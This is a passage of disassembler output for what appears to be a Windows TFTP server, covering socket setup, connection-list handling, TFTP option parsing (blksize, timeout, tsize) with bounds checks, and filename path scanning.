		jmp	short loc_1001CEA
; ---------------------------------------------------------------------------


loc_1001CDA:				; CODE XREF: sub_1001A91+1CBj
		mov	eax, [esp+70h+arg_FFA4]
		push	esi
		mov	[esi+8], eax
		call	sub_1002EC8


loc_1001CEA:				; CODE XREF: sub_1001A91+19Ej
					; sub_1001A91+1BCj ...
		push	ebx
		call	ds:dword_1001058
		mov	eax, dword_1006078
		mov	dword ptr [esi+4], offset dword_1006078
		mov	[esi], eax
		push	offset dword_1005DE8
		mov	[eax+4], esi
		mov	dword_1006078, esi
		call	ds:dword_100105C
		dec	dword_1005DF4
		push	ebx
		call	ds:dword_100104C
		xor	ebp, ebp
		jmp	loc_1001AAA
; ---------------------------------------------------------------------------


loc_1001D27:				; CODE XREF: sub_1001A91+32j
		call	ds:dword_10010F8
		jmp	short loc_1001D65
; ---------------------------------------------------------------------------


loc_1001D2F:				; CODE XREF: sub_1001A91+136j
					; sub_1001A91+161j ...
		push	ebx
		call	ds:dword_1001058
		mov	eax, dword_1006078
		mov	dword ptr [esi+4], offset dword_1006078
		mov	[esi], eax
		push	offset dword_1005DE8
		mov	[eax+4], esi
		mov	dword_1006078, esi
		call	ds:dword_100105C
		dec	dword_1005DF4


loc_1001D5E:				; CODE XREF: sub_1001A91+9Dj
		push	ebx
		call	ds:dword_100104C


loc_1001D65:				; CODE XREF: sub_1001A91+3Cj
					; sub_1001A91+29Cj
		pop	edi
		pop	esi
		pop	ebp
		xor	eax, eax
		pop	ebx
		add	esp, 10004h
		retn	8
sub_1001A91	endp ; sp-analysis failed

; ---------------------------------------------------------------------------


loc_1001D74:				; DATA XREF: sub_100188E+2Do
		push	ecx
		push	ebx
		push	ebp
		push	esi
		mov	esi, offset dword_1006020
		push	edi
		mov	edi, ds:dword_1001070
		push	esi
		xor	ebp, ebp
		xor	ebx, ebx
		call	edi ; dword_1001070


loc_1001D8B:				; CODE XREF: .text:01001DA1j
		test	eax, eax
		jnz	short loc_1001DA7
		push	0C8h
		call	ds:dword_100106C
		push	esi
		call	edi ; dword_1001070
		inc	ebx
		cmp	ebx, 7Dh
		jb	short loc_1001D8B
		test	eax, eax
		jz	short loc_1001DD1


loc_1001DA7:				; CODE XREF: .text:01001D8Dj
		lea	eax, [esp+10h]
		push	eax
		push	dword ptr [esp+1Ch]
		call	sub_10021E5
		test	eax, eax
		jnz	short loc_1001DC0
		mov	eax, [esp+10h]
		mov	ebp, [eax+0Ch]


loc_1001DC0:				; CODE XREF: .text:01001DB7j
		push	esi
		call	ds:dword_100104C
		push	ebp
		push	dword ptr [esp+1Ch]
		call	sub_1001A91


loc_1001DD1:				; CODE XREF: .text:01001DA5j
		pop	edi
		pop	esi
		pop	ebp
		xor	eax, eax
		pop	ebx
		pop	ecx
		retn	8
; ---------------------------------------------------------------------------


loc_1001DDB:				; DATA XREF: sub_100188E:loc_10018C2o
		push	0
		push	dword ptr [esp+8]
		call	sub_1001A91
		xor	eax, eax
		retn	8

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_1001DEB	proc near		; DATA XREF: sub_1001665+6o

var_4		= byte ptr -4
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		push	ecx
		lea	eax, [ebp+var_4]
		push	eax
		call	ds:dword_10010A4
		inc	dword_1006134
		pop	ecx
		lea	eax, [ebp+var_4]
		push	eax
		call	ds:dword_10010B8
		mov	eax, [ebp+arg_0]
		pop	ecx
		dec	eax
		jz	short loc_1001E68
		dec	eax
		jz	short loc_1001E35
		dec	eax
		jz	short loc_1001E1D
		dec	eax
		dec	eax
		jz	short loc_1001E68
		jmp	short loc_1001E4B
; ---------------------------------------------------------------------------


loc_1001E1D:				; CODE XREF: sub_1001DEB+2Aj
		push	dword_1006040
		call	ds:dword_1001034
		mov	dword_1006124, 4
		jmp	short loc_1001E4B
; ---------------------------------------------------------------------------


loc_1001E35:				; CODE XREF: sub_1001DEB+27j
		push	dword_1006040
		call	ds:dword_1001074
		mov	dword_1006124, 7


loc_1001E4B:				; CODE XREF: sub_1001DEB+30j
					; sub_1001DEB+48j
		push	offset dword_1006120
		push	dword_1006044
		call	ds:dword_1001014
		test	eax, eax
		jnz	short locret_1001E6F
		call	ds:dword_1001038
		jmp	short locret_1001E6F
; ---------------------------------------------------------------------------


loc_1001E68:				; CODE XREF: sub_1001DEB+24j
					; sub_1001DEB+2Ej
		push	0
		call	sub_1001E73

locret_1001E6F:				; CODE XREF: sub_1001DEB+73j
					; sub_1001DEB+7Bj
		leave
		retn	4
sub_1001DEB	endp


; =============== S U B	R O U T	I N E =======================================



sub_1001E73	proc near		; CODE XREF: sub_1001665+B9p
					; sub_1001DEB+7Fp

arg_0		= dword	ptr  4

		push	ebx
		push	ebp
		push	esi
		mov	esi, ds:dword_1001014
		push	edi
		mov	edi, offset dword_1006120
		push	edi
		mov	dword_1006124, 3
		push	dword_1006044
		call	esi ; dword_1001014
		mov	ebp, ds:dword_1001038
		xor	ebx, ebx
		cmp	eax, ebx
		jnz	short loc_1001EA3
		call	ebp ; dword_1001038


loc_1001EA3:				; CODE XREF: sub_1001E73+2Cj
		push	dword_1005DDC
		call	ds:dword_1001030
		mov	dword_1006124, 1
		mov	dword_1006134, ebx
		mov	eax, [esp+10h+arg_0]
		mov	dword_1006138, ebx
		cmp	eax, ebx
		jnz	short loc_1001EDB
		mov	dword_100612C, ebx
		mov	dword_1006130, ebx
		jmp	short loc_1001EFD
; ---------------------------------------------------------------------------


loc_1001EDB:				; CODE XREF: sub_1001E73+58j
		cmp	eax, 834h
		jb	short loc_1001EF3
		cmp	eax, 16A7h
		mov	dword_100612C, 42Ah
		jbe	short loc_1001EF8


loc_1001EF3:				; CODE XREF: sub_1001E73+6Dj
		mov	dword_100612C, eax


loc_1001EF8:				; CODE XREF: sub_1001E73+7Ej
		mov	dword_1006130, eax


loc_1001EFD:				; CODE XREF: sub_1001E73+66j
		push	edi
		push	dword_1006044
		call	esi ; dword_1001014
		cmp	eax, ebx
		jnz	short loc_1001F0C
		call	ebp ; dword_1001038


loc_1001F0C:				; CODE XREF: sub_1001E73+95j
		mov	eax, dword_1005DE0
		mov	esi, ds:dword_1001054
		cmp	eax, ebx
		jz	short loc_1001F24
		push	eax
		call	esi ; dword_1001054
		mov	dword_1005DE0, ebx


loc_1001F24:				; CODE XREF: sub_1001E73+A6j
		mov	eax, dword_1005DDC
		cmp	eax, ebx
		jz	short loc_1001F36
		push	eax
		call	esi ; dword_1001054
		mov	dword_1005DDC, ebx


loc_1001F36:				; CODE XREF: sub_1001E73+B8j
		mov	eax, dword_1005DD0
		cmp	eax, ebx
		jz	short loc_1001F4D
		push	eax
		call	ds:dword_100109C
		pop	ecx
		mov	dword_1005DD0, ebx


loc_1001F4D:				; CODE XREF: sub_1001E73+CAj
		pop	edi
		pop	esi
		pop	ebp
		pop	ebx
		retn	4
sub_1001E73	endp


; =============== S U B	R O U T	I N E =======================================



sub_1001F54	proc near		; CODE XREF: sub_1002182+1Cp
					; sub_1002219+B7p

arg_0		= dword	ptr  4

		push	esi
		mov	esi, [esp+4+arg_0]
		push	0FFFFFFFFh
		push	dword ptr [esi+10h]
		call	ds:dword_1001168
		push	dword ptr [esi+8]
		call	ds:dword_100111C
		push	dword ptr [esi+14h]
		call	ds:dword_1001118
		mov	eax, [esi]
		mov	ecx, [esi+4]
		cmp	eax, ecx
		jnz	short loc_1001F90
		mov	eax, dword_1006038
		mov	ecx, [eax]
		mov	eax, [eax+4]
		mov	[eax], ecx
		mov	[ecx+4], eax
		jmp	short loc_1001F9A
; ---------------------------------------------------------------------------


loc_1001F90:				; CODE XREF: sub_1001F54+29j
		mov	[ecx], eax
		mov	eax, [esi]
		mov	ecx, [esi+4]
		mov	[eax+4], ecx


loc_1001F9A:				; CODE XREF: sub_1001F54+3Aj
		push	esi
		call	ds:dword_10010A0
		pop	ecx
		pop	esi
		retn	4
sub_1001F54	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_1001FA6	proc near		; CODE XREF: sub_10018DB+3Dp
					; sub_1002219+1Dp

var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		push	ecx
		push	ecx
		push	ebx
		mov	ebx, [ebp+arg_0]
		push	esi
		push	edi
		xor	edi, edi
		lea	eax, [ebp+var_4]
		push	edi
		push	eax
		push	edi
		mov	[ebp+var_4], edi
		mov	[ebp+var_8], 0C0000017h
		mov	[ebx], edi
		call	sub_1003A4A
		cmp	eax, edi
		jz	short loc_1001FD3
		cmp	eax, 7Ah
		jnz	short loc_100201A


loc_1001FD3:				; CODE XREF: sub_1001FA6+26j
		push	[ebp+var_4]
		call	ds:dword_1001094
		mov	esi, eax
		pop	ecx
		cmp	esi, edi
		jz	short loc_100201A


loc_1001FE3:				; CODE XREF: sub_1001FA6+63j
		lea	eax, [ebp+var_4]
		push	edi
		push	eax
		push	esi
		call	sub_1003A4A
		cmp	eax, edi
		jz	short loc_1002015
		cmp	eax, 7Ah
		jnz	short loc_100201A
		push	[ebp+var_4]
		push	esi
		call	ds:dword_1001098
		pop	ecx
		cmp	eax, edi
		pop	ecx
		jz	short loc_100200B
		mov	esi, eax
		jmp	short loc_1001FE3
; ---------------------------------------------------------------------------


loc_100200B:				; CODE XREF: sub_1001FA6+5Fj
		push	esi
		call	ds:dword_10010A0
		pop	ecx
		jmp	short loc_100201A
; ---------------------------------------------------------------------------


loc_1002015:				; CODE XREF: sub_1001FA6+4Aj
		mov	[ebp+var_8], edi
		mov	[ebx], esi


loc_100201A:				; CODE XREF: sub_1001FA6+2Bj
					; sub_1001FA6+3Bj ...
		mov	eax, [ebp+var_8]
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn	4
sub_1001FA6	endp


; =============== S U B	R O U T	I N E =======================================



sub_1002024	proc near		; CODE XREF: sub_100205A+B7p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		push	[esp+arg_0]
		call	ds:dword_1001120
		test	eax, eax
		jz	short locret_1002057
		push	edi
		mov	edi, eax
		or	ecx, 0FFFFFFFFh
		xor	eax, eax
		repne scasb
		not	ecx
		sub	edi, ecx
		push	esi
		mov	eax, ecx
		mov	esi, edi
		mov	edi, [esp+8+arg_4]
		shr	ecx, 2
		rep movsd
		mov	ecx, eax
		and	ecx, 3
		rep movsb
		pop	esi
		pop	edi

locret_1002057:				; CODE XREF: sub_1002024+Cj
		retn	8
sub_1002024	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_100205A	proc near		; CODE XREF: sub_10018DB+64p
					; sub_1002219+65p ...

var_28		= byte ptr -28h
var_14		= word ptr -14h
var_12		= word ptr -12h
var_10		= dword	ptr -10h
var_4		= dword	ptr -4
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		sub	esp, 28h
		push	ebx
		push	esi
		xor	esi, esi
		push	edi
		mov	[ebp+var_4], esi


loc_1002068:				; CODE XREF: sub_100205A+5Dj
		push	1
		push	esi
		push	esi
		push	esi
		push	2
		push	2
		call	ds:dword_10010F4
		mov	ebx, eax
		cmp	ebx, 0FFFFFFFFh
		jz	short loc_100209D
		xor	eax, eax
		lea	edi, [ebp+var_14]
		stosd
		stosd
		stosd
		push	offset aUdp	; "udp"
		push	offset aTftp	; "tftp"
		stosd
		call	ds:dword_1001128
		cmp	eax, esi
		jnz	short loc_10020B9
		jmp	short loc_10020B1
; ---------------------------------------------------------------------------


loc_100209D:				; CODE XREF: sub_100205A+22j
		call	ds:dword_10010F8
		push	2EEh
		call	ds:dword_100106C
		inc	[ebp+var_4]


loc_10020B1:				; CODE XREF: sub_100205A+41j
		cmp	[ebp+var_4], 0Ah
		jge	short loc_10020E6
		jmp	short loc_1002068
; ---------------------------------------------------------------------------


loc_10020B9:				; CODE XREF: sub_100205A+3Fj
		mov	[ebp+var_14], 2
		mov	ax, [eax+8]
		mov	[ebp+var_12], ax
		mov	eax, [ebp+arg_0]
		mov	[ebp+var_10], eax
		lea	eax, [ebp+var_14]
		push	10h
		push	eax
		push	ebx
		call	ds:dword_1001124
		test	eax, eax
		jz	short loc_10020E6
		call	ds:dword_1001038
		jmp	short loc_100215E
; ---------------------------------------------------------------------------


loc_10020E6:				; CODE XREF: sub_100205A+5Bj
					; sub_100205A+82j
		cmp	ebx, 0FFFFFFFFh
		jz	short loc_100215E
		push	20h
		call	ds:dword_1001094
		mov	esi, eax
		pop	ecx
		test	esi, esi
		jz	short loc_100213D
		push	8
		xor	eax, eax
		pop	ecx
		mov	edi, esi
		rep stosd
		mov	eax, [ebp+arg_0]
		lea	ecx, [ebp+var_28]
		push	ecx
		push	eax
		mov	[esi+8], ebx
		mov	[esi+0Ch], eax
		call	sub_1002024
		xor	eax, eax
		push	eax
		push	eax
		push	eax
		push	eax
		call	ds:dword_1001040
		mov	edi, eax
		test	edi, edi
		jz	short loc_1002140
		push	1
		push	edi
		push	ebx
		mov	[esi+14h], edi
		call	sub_100188E
		test	eax, eax
		mov	[esi+10h], eax
		jnz	short loc_1002162
		jmp	short loc_1002140
; ---------------------------------------------------------------------------


loc_100213D:				; CODE XREF: sub_100205A+9Ej
		mov	edi, [ebp+arg_0]


loc_1002140:				; CODE XREF: sub_100205A+CCj
					; sub_100205A+E1j
		push	ebx
		call	ds:dword_100111C
		test	edi, edi
		jz	short loc_1002152
		push	edi
		call	ds:dword_1001054


loc_1002152:				; CODE XREF: sub_100205A+EFj
		test	esi, esi
		jz	short loc_100215E
		push	esi
		call	ds:dword_10010A0
		pop	ecx


loc_100215E:				; CODE XREF: sub_100205A+8Aj
					; sub_100205A+8Fj ...
		xor	eax, eax
		jmp	short loc_100217B
; ---------------------------------------------------------------------------


loc_1002162:				; CODE XREF: sub_100205A+DFj
		mov	eax, dword_1006038
		mov	dword ptr [esi+4], offset dword_1006038
		mov	[esi], eax
		mov	[eax+4], esi
		mov	dword_1006038, esi
		mov	eax, esi


loc_100217B:				; CODE XREF: sub_100205A+106j
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn	4
sub_100205A	endp


; =============== S U B	R O U T	I N E =======================================



sub_1002182	proc near		; CODE XREF: sub_1002219:loc_1002298p
		mov	ecx, dword_1006038
		push	esi
		mov	esi, offset dword_1006038
		xor	eax, eax
		cmp	ecx, esi
		jz	short loc_10021B3
		push	edi


loc_1002195:				; CODE XREF: sub_1002182+2Ej
		cmp	dword ptr [ecx+18h], 0
		mov	edi, [ecx]
		jnz	short loc_10021A8
		push	ecx
		call	sub_1001F54
		push	1
		pop	eax
		jmp	short loc_10021AC
; ---------------------------------------------------------------------------


loc_10021A8:				; CODE XREF: sub_1002182+19j
		and	dword ptr [ecx+18h], 0


loc_10021AC:				; CODE XREF: sub_1002182+24j
		cmp	edi, esi
		mov	ecx, edi
		jnz	short loc_1002195
		pop	edi


loc_10021B3:				; CODE XREF: sub_1002182+10j
		pop	esi
		retn
sub_1002182	endp


; =============== S U B	R O U T	I N E =======================================



sub_10021B5	proc near		; CODE XREF: sub_1002219+43p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		mov	edx, [esp+arg_4]
		push	esi
		mov	ecx, offset dword_1006038
		and	dword ptr [edx], 0
		mov	eax, dword_1006038


loc_10021C7:				; CODE XREF: sub_10021B5+21j
		cmp	eax, ecx
		jz	short loc_10021DF
		mov	esi, [eax+0Ch]
		cmp	esi, [esp+4+arg_0]
		jz	short loc_10021D8
		mov	eax, [eax]
		jmp	short loc_10021C7
; ---------------------------------------------------------------------------


loc_10021D8:				; CODE XREF: sub_10021B5+1Dj
		push	1
		mov	[edx], eax
		pop	eax
		jmp	short loc_10021E1
; ---------------------------------------------------------------------------


loc_10021DF:				; CODE XREF: sub_10021B5+14j
		xor	eax, eax


loc_10021E1:				; CODE XREF: sub_10021B5+28j
		pop	esi
		retn	8
sub_10021B5	endp


; =============== S U B	R O U T	I N E =======================================



sub_10021E5	proc near		; CODE XREF: .text:01001DB0p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		mov	edx, [esp+arg_4]
		push	esi
		mov	ecx, offset dword_1006038
		and	dword ptr [edx], 0
		mov	eax, dword_1006038


loc_10021F7:				; CODE XREF: sub_10021E5+21j
		cmp	eax, ecx
		jz	short loc_100220A
		mov	esi, [eax+8]
		cmp	esi, [esp+4+arg_0]
		jz	short loc_1002208
		mov	eax, [eax]
		jmp	short loc_10021F7
; ---------------------------------------------------------------------------


loc_1002208:				; CODE XREF: sub_10021E5+1Dj
		mov	[edx], eax


loc_100220A:				; CODE XREF: sub_10021E5+14j
		mov	eax, [edx]
		pop	esi
		neg	eax
		sbb	eax, eax
		and	al, 0A9h
		add	eax, 57h
		retn	8
sub_10021E5	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_1002219	proc near		; DATA XREF: sub_10018DB+CBo

var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4

		push	ebp
		mov	ebp, esp
		sub	esp, 0Ch
		push	ebx
		push	esi
		push	edi
		xor	esi, esi
		push	offset dword_1006020
		mov	[ebp+var_C], esi
		call	ds:dword_1001058
		lea	eax, [ebp+var_4]
		push	eax
		call	sub_1001FA6
		test	eax, eax
		jnz	short loc_10022A9
		mov	eax, [ebp+var_4]
		xor	ebx, ebx
		cmp	[eax], esi
		jbe	short loc_1002298


loc_1002248:				; CODE XREF: sub_1002219+7Dj
		mov	eax, [eax+esi+4]
		test	eax, eax
		jz	short loc_100228D
		cmp	eax, 100007Fh
		jz	short loc_100228D
		lea	ecx, [ebp+var_8]
		push	ecx
		push	eax
		call	sub_10021B5
		test	eax, eax
		jz	short loc_1002271
		mov	eax, [ebp+var_8]
		mov	dword ptr [eax+18h], 1
		jmp	short loc_100228D
; ---------------------------------------------------------------------------


loc_1002271:				; CODE XREF: sub_1002219+4Aj
		mov	eax, [ebp+var_4]
		push	1
		pop	edi
		push	dword ptr [eax+esi+4]
		mov	[ebp+var_C], edi
		call	sub_100205A
		test	eax, eax
		mov	[ebp+var_8], eax
		jz	short loc_100228D
		mov	[eax+18h], edi


loc_100228D:				; CODE XREF: sub_1002219+35j
					; sub_1002219+3Cj ...
		mov	eax, [ebp+var_4]
		inc	ebx
		add	esi, 18h
		cmp	ebx, [eax]
		jb	short loc_1002248


loc_1002298:				; CODE XREF: sub_1002219+2Dj
		call	sub_1002182
		push	[ebp+var_4]
		mov	esi, eax
		call	ds:dword_10010A0
		pop	ecx


loc_10022A9:				; CODE XREF: sub_1002219+24j
		cmp	[ebp+var_C], 0
		jnz	short loc_10022E9
		test	esi, esi
		jnz	short loc_10022E9
		mov	eax, dword_1006038
		mov	edi, offset dword_1006038
		cmp	eax, edi
		jz	short loc_10022E9


loc_10022C1:				; CODE XREF: sub_1002219+CEj
		mov	[ebp+var_8], eax
		mov	ebx, [eax]
		test	byte ptr [eax+1Ch], 1
		jnz	short loc_10022E3
		mov	esi, [eax+0Ch]
		push	eax
		call	sub_1001F54
		push	esi
		call	sub_100205A
		test	eax, eax
		jz	short loc_10022E3
		or	dword ptr [eax+1Ch], 1


loc_10022E3:				; CODE XREF: sub_1002219+B1j
					; sub_1002219+C4j
		cmp	ebx, edi
		mov	eax, ebx
		jnz	short loc_10022C1


loc_10022E9:				; CODE XREF: sub_1002219+94j
					; sub_1002219+98j ...
		push	offset dword_1006100
		push	offset dword_1005E00
		call	sub_1003A44
		push	offset dword_1006020
		call	ds:dword_100104C
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn	8
sub_1002219	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_100230A	proc near		; CODE XREF: sub_1001A91+242p
					; sub_10023D8+23Cp ...

var_FFBC	= word ptr -0FFBCh
var_FFBA	= word ptr -0FFBAh
var_FFB8	= byte ptr -0FFB8h
arg_0		= dword	ptr  8
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h

		push	ebp
		mov	ebp, esp
		mov	eax, 0FFBCh
		call	sub_1003A3E
		push	ebx
		push	esi
		mov	esi, ds:dword_1001104
		push	edi
		push	5
		call	esi ; dword_1001104
		mov	edi, [ebp+arg_C]
		mov	[ebp+var_FFBC],	ax
		push	edi
		call	esi ; dword_1001104
		cmp	[ebp+arg_10], 0
		mov	[ebp+var_FFBA],	ax
		jz	short loc_1002369
		mov	edi, [ebp+arg_10]
		or	ecx, 0FFFFFFFFh
		xor	eax, eax
		lea	edx, [ebp+var_FFB8]
		repne scasb
		not	ecx
		sub	edi, ecx
		mov	eax, ecx
		mov	esi, edi
		mov	edi, edx
		shr	ecx, 2
		rep movsd
		mov	ecx, eax
		and	ecx, 3
		rep movsb
		mov	edi, [ebp+arg_10]
		jmp	short loc_10023A2
; ---------------------------------------------------------------------------


loc_1002369:				; CODE XREF: sub_100230A+32j
		cmp	di, 9
		jb	short loc_1002371
		xor	edi, edi


loc_1002371:				; CODE XREF: sub_100230A+63j
		movzx	eax, di
		or	ecx, 0FFFFFFFFh
		lea	ebx, [ebp+var_FFB8]
		mov	edx, off_1005CC0[eax*4]
		xor	eax, eax
		mov	edi, edx
		repne scasb
		not	ecx
		sub	edi, ecx
		mov	eax, ecx
		mov	esi, edi
		mov	edi, ebx
		shr	ecx, 2
		rep movsd
		mov	ecx, eax
		and	ecx, 3
		rep movsb
		mov	edi, edx


loc_10023A2:				; CODE XREF: sub_100230A+5Dj
		or	ecx, 0FFFFFFFFh
		xor	eax, eax
		repne scasb
		push	10h
		push	[ebp+arg_0]
		not	ecx
		dec	ecx
		push	eax
		add	ecx, 5
		lea	eax, [ebp+var_FFBC]
		push	ecx
		push	eax
		push	[ebp+arg_8]
		call	ds:dword_1001130
		cmp	eax, 0FFFFFFFFh
		jnz	short loc_10023D1
		call	ds:dword_10010F8


loc_10023D1:				; CODE XREF: sub_100230A+BFj
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn	14h
sub_100230A	endp


; =============== S U B	R O U T	I N E =======================================



sub_10023D8	proc near		; CODE XREF: sub_1002F31+302p
					; sub_100333A+26Dp

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch
arg_C		= dword	ptr  10h
arg_10		= dword	ptr  14h
arg_14		= dword	ptr  18h

		mov	eax, [esp+arg_0]
		push	ebx
		push	ebp
		push	esi
		mov	esi, [esp+0Ch+arg_10]
		mov	dword ptr [eax+20h], 200h
		mov	dword ptr [eax+28h], 0Ah
		mov	eax, [esp+0Ch+arg_14]
		push	edi
		mov	ecx, 3FEFh
		and	dword ptr [eax], 0
		xor	eax, eax
		mov	edi, esi
		push	6
		rep stosd
		call	ds:dword_1001104
		mov	[esi], ax
		lea	ebx, [esi+2]
		mov	ebp, [esp+10h+arg_4]
		cmp	byte ptr [ebp+0], 0
		jz	loc_10025E4


loc_1002420:				; CODE XREF: sub_10023D8+202j
		mov	esi, ds:dword_100115C
		push	offset aBlksize	; "blksize"
		push	ebp
		call	esi ; dword_100115C
		pop	ecx
		test	eax, eax
		pop	ecx
		jnz	short loc_1002498
		mov	edi, ebp
		or	ecx, 0FFFFFFFFh
		repne scasb
		not	ecx
		sub	edi, ecx
		push	8
		mov	eax, ecx
		mov	esi, edi
		mov	edi, ebx
		shr	ecx, 2
		rep movsd
		mov	ecx, eax
		and	ecx, 3
		rep movsb
		pop	esi
		add	ebp, esi
		add	ebx, esi
		push	ebp
		call	ds:dword_1001160
		pop	ecx
		cmp	eax, esi
		mov	ecx, [esp+10h+arg_0]
		mov	[ecx+20h], eax
		jb	loc_10025FD
		cmp	eax, 0FFB8h
		ja	loc_10025FD
		cmp	eax, 5B0h
		jnz	short loc_100248F
		mov	dword ptr [ecx+20h], 200h
		sub	ebx, esi
		jmp	loc_10025C6
; ---------------------------------------------------------------------------


loc_100248F:				; CODE XREF: sub_10023D8+A7j
		push	0Ah
		push	ebx
		push	eax
		jmp	loc_1002597
; ---------------------------------------------------------------------------


loc_1002498:				; CODE XREF: sub_10023D8+5Aj
		push	offset aTimeout_0 ; "timeout"
		push	ebp
		call	esi ; dword_100115C
		pop	ecx
		test	eax, eax
		pop	ecx
		jnz	short loc_100251A
		mov	edi, ebp
		or	ecx, 0FFFFFFFFh
		repne scasb
		not	ecx
		sub	edi, ecx
		add	ebp, 8
		mov	eax, ecx
		mov	esi, edi
		mov	edi, ebx
		push	ebp
		shr	ecx, 2
		rep movsd
		mov	ecx, eax
		add	ebx, 8
		and	ecx, 3
		rep movsb
		call	ds:dword_1001160
		pop	ecx
		mov	ecx, [esp+10h+arg_0]
		push	1
		pop	edx
		cmp	eax, edx
		mov	[ecx+28h], eax
		jl	loc_1002602
		cmp	eax, 0FFh
		jg	loc_1002602
		mov	eax, [esp+10h+arg_14]
		mov	edi, ebp
		or	ecx, 0FFFFFFFFh
		mov	[eax], edx
		xor	eax, eax
		repne scasb
		not	ecx
		sub	edi, ecx
		mov	eax, ecx
		mov	esi, edi
		mov	edi, ebx
		shr	ecx, 2
		rep movsd
		mov	ecx, eax
		and	ecx, 3
		rep movsb
		mov	edi, ebp
		jmp	loc_10025A2
; ---------------------------------------------------------------------------


loc_100251A:				; CODE XREF: sub_10023D8+CCj
		push	offset aTsize	; "tsize"
		push	ebp
		call	esi ; dword_100115C
		pop	ecx
		mov	edi, ebp
		test	eax, eax
		pop	ecx
		jnz	loc_10025B2
		or	edx, 0FFFFFFFFh
		xor	eax, eax
		mov	ecx, edx
		add	ebp, 6
		repne scasb
		not	ecx
		sub	edi, ecx
		mov	eax, ecx
		mov	esi, edi
		mov	edi, ebx
		add	ebx, 6
		shr	ecx, 2
		rep movsd
		mov	ecx, eax
		and	ecx, 3
		cmp	[esp+10h+arg_8], 2
		rep movsb
		jnz	short loc_100258D
		mov	edi, ebp
		mov	ecx, edx
		xor	eax, eax
		repne scasb
		not	ecx
		sub	edi, ecx
		mov	eax, ecx
		mov	esi, edi
		mov	edi, ebx
		shr	ecx, 2
		rep movsd
		mov	ecx, eax
		xor	eax, eax
		and	ecx, 3
		rep movsb
		mov	edi, ebp
		mov	ecx, edx
		repne scasb
		not	ecx
		dec	ecx
		mov	edi, ebp
		lea	ebx, [ebx+ecx+1]
		mov	ecx, edx
		jmp	short loc_10025CB
; ---------------------------------------------------------------------------


loc_100258D:				; CODE XREF: sub_10023D8+180j
		mov	eax, [esp+10h+arg_0]
		push	0Ah
		push	ebx
		push	dword ptr [eax+24h]


loc_1002597:				; CODE XREF: sub_10023D8+BBj
		call	ds:dword_1001164
		add	esp, 0Ch
		mov	edi, ebx


loc_10025A2:				; CODE XREF: sub_10023D8+13Dj
		or	ecx, 0FFFFFFFFh
		xor	eax, eax
		repne scasb
		not	ecx
		dec	ecx
		lea	ebx, [ebx+ecx+1]
		jmp	short loc_10025C6
; ---------------------------------------------------------------------------


loc_10025B2:				; CODE XREF: sub_10023D8+150j
		or	ecx, 0FFFFFFFFh
		xor	eax, eax
		repne scasb
		not	ecx
		dec	ecx
		cmp	[ebp+ecx+1], al
		lea	ebp, [ebp+ecx+1]
		jz	short loc_10025E0


loc_10025C6:				; CODE XREF: sub_10023D8+B2j
					; sub_10023D8+1D8j
		mov	edi, ebp
		or	ecx, 0FFFFFFFFh


loc_10025CB:				; CODE XREF: sub_10023D8+1B3j
		xor	eax, eax
		repne scasb
		not	ecx
		dec	ecx
		cmp	[ebp+ecx+1], al
		lea	ebp, [ebp+ecx+1]
		jnz	loc_1002420


loc_10025E0:				; CODE XREF: sub_10023D8+1ECj
		mov	esi, [esp+10h+arg_10]


loc_10025E4:				; CODE XREF: sub_10023D8+42j
		mov	eax, [esp+10h+arg_C]
		sub	ebx, esi
		cmp	ebx, 2
		mov	[eax], ebx
		jnz	short loc_10025F4
		and	dword ptr [eax], 0


loc_10025F4:				; CODE XREF: sub_10023D8+217j
		xor	eax, eax


loc_10025F6:				; CODE XREF: sub_10023D8+244j
		pop	edi
		pop	esi
		pop	ebp
		pop	ebx
		retn	18h
; ---------------------------------------------------------------------------


loc_10025FD:				; CODE XREF: sub_10023D8+91j
					; sub_10023D8+9Cj
		push	0
		push	esi
		jmp	short loc_1002606
; ---------------------------------------------------------------------------


loc_1002602:				; CODE XREF: sub_10023D8+105j
					; sub_10023D8+110j
		push	0
		push	8


loc_1002606:				; CODE XREF: sub_10023D8+228j
		push	dword ptr [ecx+8]
		lea	eax, [ecx+0FFF1h]
		add	ecx, 0Ch
		push	eax
		push	ecx
		call	sub_100230A
		or	eax, 0FFFFFFFFh
		jmp	short loc_10025F6
sub_10023D8	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_100261E	proc near		; CODE XREF: sub_1002F31+130p
					; sub_100333A+150p

arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		push	ebx
		mov	ebx, [ebp+arg_0]
		push	esi
		push	edi
		mov	al, [ebx]
		mov	ecx, ebx
		mov	esi, ebx
		mov	[ebp+arg_0], ebx


loc_1002630:				; CODE XREF: sub_100261E+22j
		test	al, al
		jz	short loc_1002642
		cmp	al, 5Ch
		jz	short loc_100263C
		cmp	al, 2Fh
		jnz	short loc_1002642


loc_100263C:				; CODE XREF: sub_100261E+18j
		mov	al, [ecx+1]
		inc	ecx
		jmp	short loc_1002630
; ---------------------------------------------------------------------------


loc_1002642:				; CODE XREF: sub_100261E+14j
					; sub_100261E+1Cj ...
		mov	al, [ecx]
		test	al, al
		jz	loc_10026E4
		cmp	al, 2Eh
		jnz	loc_100271C
		mov	dl, [ecx+1]
		lea	edi, [ecx+1]
		cmp	dl, 5Ch
		jz	loc_1002718
		cmp	dl, 2Fh
		jz	loc_1002718
		cmp	dl, al
		jnz	loc_1002703
		mov	dl, [ecx+2]
		lea	edi, [ecx+2]
